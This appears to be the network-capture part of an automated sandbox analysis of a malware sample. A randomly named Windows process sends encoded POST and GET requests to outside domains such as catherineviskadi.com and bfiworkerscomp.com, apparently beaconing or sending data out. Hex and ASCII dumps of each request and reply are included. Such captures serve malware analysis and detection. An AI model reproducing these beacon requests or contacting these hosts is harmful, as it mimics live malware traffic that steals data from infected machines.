19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	217.160.0.106	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:13:48.856378078 CEST	812	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 33 7a 65 39 74 47 59 44 6a 6a 46 61 58 6c 73 79 65 52 6e 4b 2f 32 4a 59 4e 52 32 45 4b 6a 79 72 51 3d Data Ascii: YXDT=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS3ze9tGYDjjFaXlsyeRnK/2JYNR2EKjyrQ=
Aug 12, 2024 05:13:49.493937016 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 12 Aug 2024 03:13:49 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	217.160.0.106	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:13:51.388668060 CEST	10894	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 59 7a 50 76 48 41 59 63 66 65 63 78 6d 31 41 66 63 69 63 43 58 69 42 4b 54 67 6f 6a 47 36 31 4f 33 43 54 4b 63 4e 69 46 57 38 70 38 63 4e 69 50 53 38 2f 70 6c 66 55 44 56 69 4a 4a 57 52 4e 65 5a 4a 34 68 2b 43 4d 56 4c 32 47 6b 76 57 62 75 51 57 34 68 7a 72 48 44 4b 50 52 47 7a 71 2b 4e 7a 78 4d 65 59 6d 66 73 64 36 36 49 5a 2b 4a 74 64 42 66 4a 57 7a 7a 72 43 4d 63 32 49 67 6c 49 41 59 44 4c 75 4e 69 4c 69 73 47 39 36 72 77 55 69 4b 31 4f 31 4e 64 72 2b 5a 54 56 65 54 41 6b 70 73 79 [TRUNCATED] Data Ascii: YXDT=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4XZY6WMELCLd5ovk5Lh1oVAOCFvxiPkagwO5xzNRgLr8AaDnbqIR+cz7gZfa1+Pjv+mQaJoljOCpTz4MtDN7K1Awg78y6bbrQyVSnC8wxPy+SHD4IvMFqHbiBUTKP22ARYzPvHAYcfecxm1AfcicCXiBKTgojG61O3CTKcNiFW8p8cNiPS8/plfUDViJJWRNeZJ4h+CMVL2GkvWbuQW4hzrHDKPRGzq+NzxMeYmfsd66IZ+JtdBfJWzzrCMc2IglIAYDLuNiLisG96rwUiK1O1Ndr+ZTVeTAkpsy8N3Z8rD7lcRSzFx9wsgGZssteRr2+8wfmeLQSVInd316fCKzj7ZSx/MmL+7KZAmKuxbX20KqC/UrgjH2QGd49+SJkZtMsCBBlTJxxTR+ss3NtZykLjFEsi6uwKYZm0dPAafUC0eaMjNQzm1xGSoexdOfMVPEplukhxL8jQfFwq6HLfN4iKqJLBlJ77jT0CfOGg8TyycBrggKLk5fY4H724rheygicyuNu9NZVhhWHJZPaKnhHjblfqtQHU76541+e2mV4Xb8NjPIz13kR326M1Rd7kxETl8/axlmDwzkaXnAHYn12oplx7T7vCyxn1sml0cpymgZNGoGvppoYnwLLdmDsQrBhmNAmT+Wo3UzCj8RqWqKE2bg8He7//XPGX4vohdc3ki0XAOJKor4YZrrM4byjsyu1AcU48YJhr33J1vyBq+qz/t0DUXYoXhsZT1+Qu2RLXUQXmoNtfzC8qGGlK/3XRAG31vei16Bil4l3fNfR79BC7Zv/Wk3X6aX5dosNc1hTfAzloltqF7T6tM8Xnr/KGTZ0DPzjfKttuaOGOaWy0tKZy/TLLQA2baUY/e7jYIj4ostkFyMi+lxa0+LOmSZ4x+rwS9hmDaCnNUMaRXwCpU/QyxxFkyhYXDdkvxMCIhO4+wLmd6eYe4BYQuRXS26NQcWO2w9od [TRUNCATED]
Aug 12, 2024 05:13:52.142559052 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 12 Aug 2024 03:13:51 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	217.160.0.106	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:13:53.964392900 CEST	508	OUT	GET /qe66/?YXDT=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&ZH3=yf1H3v6h HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.catherineviskadi.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 12, 2024 05:13:54.608198881 CEST	770	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Mon, 12 Aug 2024 03:13:54 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	208.91.197.27	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:14:16.213109970 CEST	786	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 4c 72 77 45 67 4b 5a 55 48 57 71 63 4e 61 63 4d 38 76 73 75 5a 2b 48 6b 42 51 71 69 61 4d 62 6a 67 3d 3d Data Ascii: YXDT=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDLrwEgKZUHWqcNacM8vsuZ+HkBQqiaMbjg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	208.91.197.27	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:14:18.749522924 CEST	806	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 61 30 35 47 5a 65 76 5a 78 53 34 76 78 43 4e 4e 47 72 33 70 4b 4e 43 74 54 4b 49 56 45 42 77 76 73 3d Data Ascii: YXDT=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78Za05GZevZxS4vxCNNGr3pKNCtTKIVEBwvs=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	208.91.197.27	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:14:21.291794062 CEST	10888	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 43 71 54 64 6a 61 48 39 36 50 76 49 71 59 37 32 78 4f 72 4a 34 54 37 38 78 58 4e 63 36 63 69 74 50 75 41 2f 71 68 66 67 55 77 70 36 2f 35 62 34 5a 41 73 69 49 33 61 68 79 32 58 59 43 6c 73 75 59 6f 4c 52 57 38 47 58 6c 66 46 4a 51 69 52 57 39 4a 42 69 71 48 4b 61 6f 4b 36 49 77 39 7a 4b 71 64 6a 72 44 57 31 5a 46 4b 44 54 57 43 7a 4d 71 62 39 6e 64 65 54 6b 62 65 41 51 75 41 45 6c 51 49 6e 44 6a 34 73 45 77 49 37 71 45 71 51 45 6f 2f 34 30 48 74 4c 52 34 63 50 45 43 49 74 6d 46 4a 7a [TRUNCATED] Data Ascii: YXDT=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5Jocmq6xc6LJXtzpf1TPVjyJ7QLVT6xgiLHgrNuzEz5fppDcQZszkOQcbx04v1UdZ00hJ9YnHhMa0SAXJ7ZPkLHd0JrahC9d1a4LZyFidbSoktgs/Sbqtx+G6v+PBeAaHCqTdjaH96PvIqY72xOrJ4T78xXNc6citPuA/qhfgUwp6/5b4ZAsiI3ahy2XYClsuYoLRW8GXlfFJQiRW9JBiqHKaoK6Iw9zKqdjrDW1ZFKDTWCzMqb9ndeTkbeAQuAElQInDj4sEwI7qEqQEo/40HtLR4cPECItmFJz8q2d6pU4Ll7VU2sZsAI1N9jsSxu+eTj6YbKXJv8fXXQqvG3BbGJskhF9Ve/wnRYhL+vXXqZZNGcGKVV7oYforgpXJpV3bcZ7DCMeRW7Q4foENPhAjoU1k/cFL2mm9gvpNiCf9X3hjL7s24pdlVzpUBejJjFPnHCKCLtRG8Qg2CQkZVaQe1zHyLzOMYQoYnUmTRlCeEKfq3CRh32Ny3Ni9lv8d+qKbPpzr/5XQKeEO3VWB6H0w96rKUdeKp7EoPDK2c/T03xZ9XKxqd47zb5IXLF0gw1CqvJoxn4C0BzUPdwFbrGTNJ7LEZyjUs1OgzEVCU+NYuhfr1wLdGLMIliXxTxIQ4XNR2rQzj+I1Su0kk1PiIl1P7lYqE1W8q7cpo3do02/UjfJugRn+Z3T4OqN905CBUBc40YcJjXZVlxb6yt0SulegB5Vyqw0Tkv5hbbxvtVC46sNp4Lg+/5tJTQW6EyDP5ReN2c/SOL9Qw/R9yo8Bk2QsMcpuIeWbe6f9fRkuy+olxap3NUgeloDC00V39WiomQYDqW1N+FpmL3yF9wb9tS0EzK7kFus2Mv/5VI365zo1jlEyxmNbHS04P9WqPbVzcBxdz1bCjN+OrYYRhDeL4DEjI19X+KLct1xHqmHD1cEqqeaEC7VViPP16JAXO8lYaiE6AnBA0 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	208.91.197.27	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:14:23.824186087 CEST	506	OUT	GET /xzzi/?ZH3=yf1H3v6h&YXDT=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.bfiworkerscomp.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 12, 2024 05:14:25.277790070 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 12 Aug 2024 03:14:05 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=932vr47097804579346985; expires=Sat, 11-Aug-2029 03:14:05 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_X4bWqCCfjNgRCWoEtCaPqxQfxqmLJzCS2YlulDCgrTKlTlLWQ4lbIdEEDNbN/CJfwm9vAlUE0fESHuO3NdrVzg== Content-Length: 2630 Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 58 34 62 57 71 43 43 66 6a 4e 67 52 43 57 6f 45 74 43 61 50 71 78 51 66 78 71 6d 4c 4a 7a 43 53 32 59 6c 75 6c 44 43 67 72 54 4b 6c 54 6c 4c 57 51 34 6c 62 49 64 45 45 44 4e 62 4e 2f 43 4a 66 77 6d 39 76 41 6c 55 45 30 66 45 Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_X4bWqCCfjNgRCWoEtCaPqxQfxqmLJzCS2YlulDCgrTKlTlLWQ4lbIdEEDNbN/CJfwm9vAlUE0fE
